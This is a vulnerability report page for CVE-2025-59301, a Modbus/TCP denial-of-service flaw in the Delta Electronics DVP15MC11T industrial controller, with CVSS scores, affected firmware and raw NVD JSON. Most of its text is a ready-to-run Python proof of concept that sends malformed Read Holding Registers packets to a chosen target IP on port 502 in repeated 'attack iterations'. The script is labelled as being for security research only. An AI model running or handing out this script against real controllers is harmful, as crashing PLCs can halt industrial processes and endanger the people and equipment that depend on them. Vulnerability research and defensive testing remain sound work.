Security Vulnerability Report
中文
CVE-2025-59301 CVSS 4.0 MEDIUM

CVE-2025-59301

Published: 2025-12-22 04:16:01
Last Modified: 2026-01-08 13:30:28
Source: 759f5e80-c8e1-4224-bead-956d7b33c98b

Description

Delta Electronics DVP15MC11T lacks proper validation of the modbus/tcp packets and can lead to denial of service.

CVSS Details

CVSS Score
4.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:deltaww:dvp15mc11t_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:deltaww:dvp15mc11t:-:*:*:*:*:*:*:* - NOT VULNERABLE
Delta Electronics DVP15MC11T (固件版本未明确修复前)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-59301 PoC - Delta DVP15MC11T Modbus/TCP DoS Note: This PoC is for educational and authorized testing purposes only. """ import socket import struct import sys def create_malformed_modbus_packet(): """ Create a malformed Modbus/TCP packet to trigger the vulnerability. The vulnerability exists due to lack of proper validation of Modbus/TCP packets. """ # Modbus TCP Header (MBAP) transaction_id = struct.pack('>H', 0x0001) # Transaction Identifier protocol_id = struct.pack('>H', 0x0000) # Protocol Identifier length = struct.pack('>H', 0x0006) # Length (6 bytes for unit ID + function code + data) unit_id = struct.pack('B', 0xFF) # Unit Identifier # Malformed Function Code with invalid parameters function_code = struct.pack('B', 0x03) # Read Holding Registers (with malicious parameters) # Invalid reference number and quantity starting_address = struct.pack('>H', 0xFFFF) # Invalid address quantity = struct.pack('>H', 0xFFFF) # Invalid quantity packet = transaction_id + protocol_id + length + unit_id + function_code + starting_address + quantity return packet def send_dos_packet(target_ip, target_port=502): """ Send malicious Modbus/TCP packet to trigger DoS condition. """ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) try: sock.connect((target_ip, target_port)) print(f"[*] Connected to {target_ip}:{target_port}") # Send malformed packet packet = create_malformed_modbus_packet() sock.send(packet) print(f"[*] Sent malformed Modbus/TCP packet ({len(packet)} bytes)") # Try to receive response try: response = sock.recv(1024) print(f"[*] Received response: {response.hex()}") except socket.timeout: print("[!] No response received - target may be affected") except socket.error as e: print(f"[!] Socket error: {e}") finally: sock.close() def main(): if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") print(f"Example: {sys.argv[0]} 192.168.1.100 502") sys.exit(1) target_ip = sys.argv[1] target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 502 print(f"[*] CVE-2025-59301 PoC - Delta DVP15MC11T Modbus/TCP DoS") print(f"[*] Target: {target_ip}:{target_port}") # Send multiple packets to increase effectiveness for i in range(5): print(f"\n[*] Attack iteration {i+1}/5") send_dos_packet(target_ip, target_port) print("\n[*] Attack completed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59301", "sourceIdentifier": "759f5e80-c8e1-4224-bead-956d7b33c98b", "published": "2025-12-22T04:16:00.897", "lastModified": "2026-01-08T13:30:27.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Delta Electronics DVP15MC11T lacks proper validation of the modbus/tcp packets and can lead to denial of service."}], "metrics": {"cvssMetricV31": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:N/A:H", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.4, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:deltaww:dvp15mc11t_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.16.0", "matchCriteriaId": "C620AC49-25B9-46E2-A71D-EE8F6E1D7B1A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:deltaww:dvp15mc11t:-:*:*:*:*:*:*:*", "matchCriteriaId": "16E9F8F3-5971-4CDE-9588-05DC9F83F293"}]}]}], "references": [{"url": "https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2025-00020_DVP15MC11T%20Modbus%20TCP%20DoS%20Vulnerability.pdf", "source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "tags": ["Vendor Advisory"]}]}}